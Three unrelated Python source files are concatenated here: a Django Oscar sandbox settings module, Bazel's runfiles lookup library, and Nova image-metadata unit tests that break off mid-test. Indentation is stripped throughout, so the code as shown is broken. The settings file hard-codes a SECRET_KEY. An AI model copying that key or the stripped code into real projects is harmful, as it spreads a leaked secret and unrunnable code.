SILENCED_SYSTEM_CHECKS = ['1_6.W001', ]
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
# Includes all languages that have >50% coverage in Transifex
# Taken from Django's default setting for LANGUAGES
gettext_noop = lambda s: s
LANGUAGES = (
('ar', gettext_noop('Arabic')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('en-gb', gettext_noop('British English')),
('el', gettext_noop('Greek')),
('es', gettext_noop('Spanish')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('it', gettext_noop('Italian')),
('ko', gettext_noop('Korean')),
('nl', gettext_noop('Dutch')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portuguese')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('uk', gettext_noop('Ukrainian')),
('zh-cn', gettext_noop('Simplified Chinese')),
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = location("public/media")
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
#ADMIN_MEDIA_PREFIX = '/media/admin/'
STATIC_URL = '/static/'
STATIC_ROOT = location('public/static')
STATICFILES_DIRS = (
location('static/'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '$)a7n&o80u!6y5t-+jrd3)3!%vh&shg$wqpjpxc!ar&p#!)n1a'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# needed by django-treebeard for admin (and potentially other libs)
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.contrib.messages.context_processors.messages",
# Oscar specific
'oscar.apps.search.context_processors.search_form',
'oscar.apps.promotions.context_processors.promotions',
'oscar.apps.checkout.context_processors.checkout',
'oscar.core.context_processors.metadata',
'oscar.apps.customer.notifications.context_processors.notifications',
)
MIDDLEWARE_CLASSES = (
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.transaction.TransactionMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
# Allow languages to be selected
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
# Ensure a valid basket is added to the request instance for every request
'oscar.apps.basket.middleware.BasketMiddleware',
# Enable the ProfileMiddleware, then add ?cprofile to any
# URL path to print out profile details
#'oscar.profiling.middleware.ProfileMiddleware',
)
ROOT_URLCONF = 'urls'
# Add another path to Oscar's templates. This allows templates to be
# customised easily.
from oscar import OSCAR_MAIN_TEMPLATE_DIR
TEMPLATE_DIRS = (
location('templates'),
OSCAR_MAIN_TEMPLATE_DIR,
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(message)s',
},
'simple': {
'format': '[%(asctime)s] %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'checkout_file': {
'level': 'INFO',
'class': 'oscar.core.logging.handlers.EnvFileHandler',
'filename': 'checkout.log',
'formatter': 'verbose'
},
'gateway_file': {
'level': 'INFO',
'class': 'oscar.core.logging.handlers.EnvFileHandler',
'filename': 'gateway.log',
'formatter': 'simple'
},
'error_file': {
'level': 'INFO',
'class': 'oscar.core.logging.handlers.EnvFileHandler',
'filename': 'errors.log',
'formatter': 'verbose'
},
'sorl_file': {
'level': 'INFO',
'class': 'oscar.core.logging.handlers.EnvFileHandler',
'filename': 'sorl.log',
'formatter': 'verbose'
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'filters': ['require_debug_false'],
},
},
'loggers': {
# Django loggers
'django': {
'handlers': ['null'],
'propagate': True,
'level': 'INFO',
},
'django.request': {
'handlers': ['mail_admins', 'error_file'],
'level': 'ERROR',
'propagate': False,
},
'django.db.backends': {
'handlers': ['null'],
'propagate': False,
'level': 'DEBUG',
},
# Oscar core loggers
'oscar.checkout': {
'handlers': ['console', 'checkout_file'],
'propagate': False,
'level': 'INFO',
},
'oscar.catalogue.import': {
'handlers': ['console'],
'propagate': False,
'level': 'INFO',
},
'oscar.alerts': {
'handlers': ['null'],
'propagate': False,
'level': 'INFO',
},
# Sandbox logging
'gateway': {
'handlers': ['gateway_file'],
'propagate': True,
'level': 'INFO',
},
# Third party
'south': {
'handlers': ['null'],
'propagate': True,
'level': 'INFO',
},
'sorl.thumbnail': {
'handlers': ['sorl_file'],
'propagate': True,
'level': 'INFO',
},
# Suppress output of this debug toolbar panel
'template_timings_panel': {
'handlers': ['null'],
'level': 'DEBUG',
'propagate': False,
}
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.flatpages',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django_extensions',
# Debug toolbar + extensions
'debug_toolbar',
'template_timings_panel',
'compressor', # Oscar's templates use compressor
'apps.gateway', # For allowing dashboard access
]
from oscar import get_core_apps
INSTALLED_APPS = INSTALLED_APPS + get_core_apps()
# As we use the sandbox to create both South migrations and native ones,
# the sandbox needs to work both with Django < 1.7 and 1.7
import django
if django.VERSION < (1, 7):
INSTALLED_APPS.append('south')
# Add Oscar's custom auth backend so users can sign in using their email
# address.
AUTHENTICATION_BACKENDS = (
'oscar.apps.customer.auth_backends.EmailBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_REDIRECT_URL = '/'
APPEND_SLASH = True
# Haystack settings
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': location('whoosh_index'),
},
}
# Here's a sample Haystack config if using Solr (which is recommended)
#HAYSTACK_CONNECTIONS = {
# 'default': {
# 'ENGINE': 'haystack.backends.solr_backend.SolrEngine',
# 'URL': u'http://127.0.0.1:8983/solr/oscar_latest/',
# 'INCLUDE_SPELLING': True
# },
#}
# =============
# Debug Toolbar
# =============
# Implicit setup can often lead to problems with circular imports, so we
# explicitly wire up the toolbar
DEBUG_TOOLBAR_PATCH_SETTINGS = False
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'template_timings_panel.panels.TemplateTimings.TemplateTimings',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
]
INTERNAL_IPS = ['127.0.0.1', '::1']
# ==============
# Oscar settings
# ==============
from oscar.defaults import *
# Meta
# ====
OSCAR_SHOP_TAGLINE = 'Sandbox'
OSCAR_RECENTLY_VIEWED_PRODUCTS = 20
OSCAR_ALLOW_ANON_CHECKOUT = True
# This is added to each template context by the core context processor. It is
# useful for test/stage/qa sites where you want to show the version of the site
# in the page title.
DISPLAY_VERSION = False
# Order processing
# ================
# Sample order/line status settings. This is quite simplistic. It's like you'll
# want to override the set_status method on the order object to do more
# sophisticated things.
OSCAR_INITIAL_ORDER_STATUS = 'Pending'
OSCAR_INITIAL_LINE_STATUS = 'Pending'
# This dict defines the new order statuses than an order can move to
OSCAR_ORDER_STATUS_PIPELINE = {
'Pending': ('Being processed', 'Cancelled',),
'Being processed': ('Complete', 'Cancelled',),
'Cancelled': (),
'Complete': (),
}
# This dict defines the line statuses that will be set when an order's status
# is changed
OSCAR_ORDER_STATUS_CASCADE = {
'Being processed': 'Being processed',
'Cancelled': 'Cancelled',
'Complete': 'Shipped',
}
# LESS/CSS/statics
# ================
# We default to using CSS files, rather than the LESS files that generate them.
# If you want to develop Oscar's CSS, then set USE_LESS=True and
# COMPRESS_ENABLED=False in your settings_local module and ensure you have
# 'lessc' installed.
USE_LESS = False
COMPRESS_ENABLED = True
COMPRESS_PRECOMPILERS = (
('text/less', 'lessc {infile} {outfile}'),
)
COMPRESS_OFFLINE_CONTEXT = {
'STATIC_URL': 'STATIC_URL',
'use_less': USE_LESS,
}
# We do this to work around an issue in compressor where the LESS files are
# compiled but compression isn't enabled. When this happens, the relative URL
# is wrong between the generated CSS file and other assets:
# https://github.com/jezdez/django_compressor/issues/226
COMPRESS_OUTPUT_DIR = 'oscar'
# Logging
# =======
LOG_ROOT = location('logs')
# Ensure log root exists
if not os.path.exists(LOG_ROOT):
os.mkdir(LOG_ROOT)
# Sorl
# ====
THUMBNAIL_DEBUG = True
THUMBNAIL_KEY_PREFIX = 'oscar-sandbox'
# Django 1.6 has switched to JSON serializing for security reasons, but it does not
# serialize Models. We should resolve this by extending the
# django/core/serializers/json.Serializer to have the `dumps` function. Also
# in tests/config.py
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# Try and import local settings which can be used to override any of the above.
try:
from settings_local import *
except ImportError:
pass
|
|
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# Vendored in from bazelbuild/bazel (tools/python/runfiles/runfiles.py) at #
# commit 6c60a8ec049b6b8540c473969dd7bd1dad46acb9 (2019-07-19). See #
# //python/runfiles:BUILD for details. #
###############################################################################
"""Runfiles lookup library for Bazel-built Python binaries and tests.
USAGE:
1. Depend on this runfiles library from your build rule:
py_binary(
name = "my_binary",
...
deps = ["@bazel_tools//tools/python/runfiles"],
)
2. Import the runfiles library.
from bazel_tools.tools.python.runfiles import runfiles
3. Create a Runfiles object and use rlocation to look up runfile paths:
r = runfiles.Create()
...
with open(r.Rlocation("my_workspace/path/to/my/data.txt"), "r") as f:
contents = f.readlines()
...
The code above creates a manifest- or directory-based implementations based
on the environment variables in os.environ. See `Create()` for more info.
If you want to explicitly create a manifest- or directory-based
implementations, you can do so as follows:
r1 = runfiles.CreateManifestBased("path/to/foo.runfiles_manifest")
r2 = runfiles.CreateDirectoryBased("path/to/foo.runfiles/")
If you want to start subprocesses that also need runfiles, you need to set
the right environment variables for them:
import subprocess
from bazel_tools.tools.python.runfiles import runfiles
r = runfiles.Create()
env = {}
...
env.update(r.EnvVars())
p = subprocess.Popen([r.Rlocation("path/to/binary")], env, ...)
"""
import os
import posixpath
def CreateManifestBased(manifest_path):
return _Runfiles(_ManifestBased(manifest_path))
def CreateDirectoryBased(runfiles_dir_path):
return _Runfiles(_DirectoryBased(runfiles_dir_path))
def Create(env=None):
"""Returns a new `Runfiles` instance.
The returned object is either:
- manifest-based, meaning it looks up runfile paths from a manifest file, or
- directory-based, meaning it looks up runfile paths under a given directory
path
If `env` contains "RUNFILES_MANIFEST_FILE" with non-empty value, this method
returns a manifest-based implementation. The object eagerly reads and caches
the whole manifest file upon instantiation; this may be relevant for
performance consideration.
Otherwise, if `env` contains "RUNFILES_DIR" with non-empty value (checked in
this priority order), this method returns a directory-based implementation.
If neither cases apply, this method returns null.
Args:
env: {string: string}; optional; the map of environment variables. If None,
this function uses the environment variable map of this process.
Raises:
IOError: if some IO error occurs.
"""
env_map = os.environ if env is None else env
manifest = env_map.get("RUNFILES_MANIFEST_FILE")
if manifest:
return CreateManifestBased(manifest)
directory = env_map.get("RUNFILES_DIR")
if directory:
return CreateDirectoryBased(directory)
return None
class _Runfiles(object):
"""Returns the runtime location of runfiles.
Runfiles are data-dependencies of Bazel-built binaries and tests.
"""
def __init__(self, strategy):
self._strategy = strategy
def Rlocation(self, path):
"""Returns the runtime path of a runfile.
Runfiles are data-dependencies of Bazel-built binaries and tests.
The returned path may not be valid. The caller should check the path's
validity and that the path exists.
The function may return None. In that case the caller can be sure that the
rule does not know about this data-dependency.
Args:
path: string; runfiles-root-relative path of the runfile
Returns:
the path to the runfile, which the caller should check for existence, or
None if the method doesn't know about this runfile
Raises:
TypeError: if `path` is not a string
ValueError: if `path` is None or empty, or it's absolute or not normalized
"""
if not path:
raise ValueError()
if not isinstance(path, str):
raise TypeError()
if (
path.startswith("../")
or "/.." in path
or path.startswith("./")
or "/./" in path
or path.endswith("/.")
or "//" in path
):
raise ValueError('path is not normalized: "%s"' % path)
if path[0] == "\\":
raise ValueError('path is absolute without a drive letter: "%s"' % path)
if os.path.isabs(path):
return path
return self._strategy.RlocationChecked(path)
def EnvVars(self):
"""Returns environment variables for subprocesses.
The caller should set the returned key-value pairs in the environment of
subprocesses in case those subprocesses are also Bazel-built binaries that
need to use runfiles.
Returns:
{string: string}; a dict; keys are environment variable names, values are
the values for these environment variables
"""
return self._strategy.EnvVars()
class _ManifestBased(object):
"""`Runfiles` strategy that parses a runfiles-manifest to look up runfiles."""
def __init__(self, path):
if not path:
raise ValueError()
if not isinstance(path, str):
raise TypeError()
self._path = path
self._runfiles = _ManifestBased._LoadRunfiles(path)
def RlocationChecked(self, path):
return self._runfiles.get(path)
@staticmethod
def _LoadRunfiles(path):
"""Loads the runfiles manifest."""
result = {}
with open(path, "r") as f:
for line in f:
line = line.strip()
if line:
tokens = line.split(" ", 1)
if len(tokens) == 1:
result[line] = line
else:
result[tokens[0]] = tokens[1]
return result
def _GetRunfilesDir(self):
if self._path.endswith("/MANIFEST") or self._path.endswith("\\MANIFEST"):
return self._path[: -len("/MANIFEST")]
elif self._path.endswith(".runfiles_manifest"):
return self._path[: -len("_manifest")]
else:
return ""
def EnvVars(self):
directory = self._GetRunfilesDir()
return {
"RUNFILES_MANIFEST_FILE": self._path,
"RUNFILES_DIR": directory,
# TODO(laszlocsomor): remove JAVA_RUNFILES once the Java launcher can
# pick up RUNFILES_DIR.
"JAVA_RUNFILES": directory,
}
class _DirectoryBased(object):
"""`Runfiles` strategy that appends runfiles paths to the runfiles root."""
def __init__(self, path):
if not path:
raise ValueError()
if not isinstance(path, str):
raise TypeError()
self._runfiles_root = path
def RlocationChecked(self, path):
# Use posixpath instead of os.path, because Bazel only creates a runfiles
# tree on Unix platforms, so `Create()` will only create a directory-based
# runfiles strategy on those platforms.
return posixpath.join(self._runfiles_root, path)
def EnvVars(self):
return {
"RUNFILES_DIR": self._runfiles_root,
# TODO(laszlocsomor): remove JAVA_RUNFILES once the Java launcher can
# pick up RUNFILES_DIR.
"JAVA_RUNFILES": self._runfiles_root,
}
def _PathsFrom(
argv0, runfiles_mf, runfiles_dir, is_runfiles_manifest, is_runfiles_directory
):
"""Discover runfiles manifest and runfiles directory paths.
Args:
argv0: string; the value of sys.argv[0]
runfiles_mf: string; the value of the RUNFILES_MANIFEST_FILE environment
variable
runfiles_dir: string; the value of the RUNFILES_DIR environment variable
is_runfiles_manifest: lambda(string):bool; returns true if the argument is
the path of a runfiles manifest file
is_runfiles_directory: lambda(string):bool; returns true if the argument is
the path of a runfiles directory
Returns:
(string, string) pair, first element is the path to the runfiles manifest,
second element is the path to the runfiles directory. If the first element
is non-empty, then is_runfiles_manifest returns true for it. Same goes for
the second element and is_runfiles_directory respectively. If both elements
are empty, then this function could not find a manifest or directory for
which is_runfiles_manifest or is_runfiles_directory returns true.
"""
mf_alid = is_runfiles_manifest(runfiles_mf)
dir_valid = is_runfiles_directory(runfiles_dir)
if not mf_alid and not dir_valid:
runfiles_mf = argv0 + ".runfiles/MANIFEST"
runfiles_dir = argv0 + ".runfiles"
mf_alid = is_runfiles_manifest(runfiles_mf)
dir_valid = is_runfiles_directory(runfiles_dir)
if not mf_alid:
runfiles_mf = argv0 + ".runfiles_manifest"
mf_alid = is_runfiles_manifest(runfiles_mf)
if not mf_alid and not dir_valid:
return ("", "")
if not mf_alid:
runfiles_mf = runfiles_dir + "/MANIFEST"
mf_alid = is_runfiles_manifest(runfiles_mf)
if not mf_alid:
runfiles_mf = runfiles_dir + "_manifest"
mf_alid = is_runfiles_manifest(runfiles_mf)
if not dir_valid:
runfiles_dir = runfiles_mf[:-9] # "_manifest" or "/MANIFEST"
dir_valid = is_runfiles_directory(runfiles_dir)
return (runfiles_mf if mf_alid else "", runfiles_dir if dir_valid else "")
|
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from oslo_serialization import jsonutils
import webob
from nova.api.openstack.compute import image_metadata as image_metadata_v21
from nova.api.openstack.compute.legacy_v2 import image_metadata
from nova import exception
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import image_fixtures
IMAGE_FIXTURES = image_fixtures.get_image_fixtures()
CHK_QUOTA_STR = 'nova.api.openstack.common.check_img_metadata_properties_quota'
def get_image_123():
return copy.deepcopy(IMAGE_FIXTURES)[0]
class ImageMetaDataTestV21(test.NoDBTestCase):
controller_class = image_metadata_v21.ImageMetadataController
invalid_request = exception.ValidationError
def setUp(self):
super(ImageMetaDataTestV21, self).setUp()
self.controller = self.controller_class()
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_index(self, get_all_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata')
res_dict = self.controller.index(req, '123')
expected = {'metadata': {'key1': 'value1'}}
self.assertEqual(res_dict, expected)
get_all_mocked.assert_called_once_with(mock.ANY, '123')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_show(self, get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
res_dict = self.controller.show(req, '123', 'key1')
self.assertIn('meta', res_dict)
self.assertEqual(len(res_dict['meta']), 1)
self.assertEqual('value1', res_dict['meta']['key1'])
get_mocked.assert_called_once_with(mock.ANY, '123')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_show_not_found(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key9')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, '123', 'key9')
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_show_image_not_found(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata/key1')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, '100', 'key9')
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_create(self, get_mocked, update_mocked, quota_mocked):
mock_result = copy.deepcopy(get_image_123())
mock_result['properties']['key7'] = 'value7'
update_mocked.return_value = mock_result
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata')
req.method = 'POST'
body = {"metadata": {"key7": "value7"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res = self.controller.create(req, '123', body=body)
get_mocked.assert_called_once_with(mock.ANY, '123')
expected = copy.deepcopy(get_image_123())
expected['properties'] = {
'key1': 'value1', # existing meta
'key7': 'value7' # new meta
}
quota_mocked.assert_called_once_with(mock.ANY, expected["properties"])
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
expected_output = {'metadata': {'key1': 'value1', 'key7': 'value7'}}
self.assertEqual(expected_output, res)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_create_image_not_found(self, _get_mocked, update_mocked,
quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata')
req.method = 'POST'
body = {"metadata": {"key7": "value7"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.create, req, '100', body=body)
self.assertFalse(quota_mocked.called)
self.assertFalse(update_mocked.called)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_update_all(self, get_mocked, update_mocked, quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata')
req.method = 'PUT'
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res = self.controller.update_all(req, '123', body=body)
get_mocked.assert_called_once_with(mock.ANY, '123')
expected = copy.deepcopy(get_image_123())
expected['properties'] = {
'key9': 'value9' # replace meta
}
quota_mocked.assert_called_once_with(mock.ANY, expected["properties"])
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
expected_output = {'metadata': {'key9': 'value9'}}
self.assertEqual(expected_output, res)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_update_all_image_not_found(self, _get_mocked, quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata')
req.method = 'PUT'
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update_all, req, '100', body=body)
self.assertFalse(quota_mocked.called)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_update_item(self, _get_mocked, update_mocked, quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "zz"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res = self.controller.update(req, '123', 'key1', body=body)
expected = copy.deepcopy(get_image_123())
expected['properties'] = {
'key1': 'zz' # changed meta
}
quota_mocked.assert_called_once_with(mock.ANY, expected["properties"])
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
expected_output = {'meta': {'key1': 'zz'}}
self.assertEqual(res, expected_output)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_update_item_image_not_found(self, _get_mocked, quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "zz"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update, req, '100', 'key1',
body=body)
self.assertFalse(quota_mocked.called)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get')
def test_update_item_bad_body(self, get_mocked, update_mocked,
quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'PUT'
body = {"key1": "zz"}
req.body = ''
req.headers["content-type"] = "application/json"
self.assertRaises(self.invalid_request,
self.controller.update, req, '123', 'key1',
body=body)
self.assertFalse(get_mocked.called)
self.assertFalse(quota_mocked.called)
self.assertFalse(update_mocked.called)
@mock.patch(CHK_QUOTA_STR,
side_effect=webob.exc.HTTPRequestEntityTooLarge(
explanation='', headers={'Retry-After': 0}))
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get')
def test_update_item_too_many_keys(self, get_mocked, update_mocked,
_quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'PUT'
body = {"meta": {"foo": "bar"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, '123', 'key1',
body=body)
self.assertFalse(get_mocked.called)
self.assertFalse(update_mocked.called)
@mock.patch(CHK_QUOTA_STR)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_update_item_body_uri_mismatch(self, _get_mocked, update_mocked,
quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/bad')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, '123', 'bad',
body=body)
self.assertFalse(quota_mocked.called)
self.assertFalse(update_mocked.called)
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_delete(self, _get_mocked, update_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'DELETE'
res = self.controller.delete(req, '123', 'key1')
expected = copy.deepcopy(get_image_123())
expected['properties'] = {}
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
self.assertIsNone(res)
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_delete_not_found(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/blah')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, '123', 'blah')
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotFound(image_id='100'))
def test_delete_image_not_found(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/100/metadata/key1')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, '100', 'key1')
@mock.patch(CHK_QUOTA_STR,
side_effect=webob.exc.HTTPForbidden(
explanation='', headers={'Retry-After': 0}))
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_too_many_metadata_items_on_create(self, _get_mocked,
update_mocked, _quota_mocked):
body = {"metadata": {"foo": "bar"}}
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.create, req, '123', body=body)
self.assertFalse(update_mocked.called)
@mock.patch(CHK_QUOTA_STR,
side_effect=webob.exc.HTTPForbidden(
explanation='', headers={'Retry-After': 0}))
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_too_many_metadata_items_on_put(self, _get_mocked,
update_mocked, _quota_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/blah')
req.method = 'PUT'
body = {"meta": {"blah": "blah", "blah1": "blah1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.invalid_request,
self.controller.update, req, '123', 'blah',
body=body)
self.assertFalse(update_mocked.called)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotAuthorized(image_id='123'))
def test_image_not_authorized_update(self, _get_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.update, req, '123', 'key1',
body=body)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotAuthorized(image_id='123'))
def test_image_not_authorized_update_all(self, _get_mocked):
image_id = 131
# see nova.tests.unit.api.openstack.fakes:_make_image_fixtures
req = fakes.HTTPRequest.blank('/v2/fake/images/%s/metadata/key1'
% image_id)
req.method = 'PUT'
body = {"metadata": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
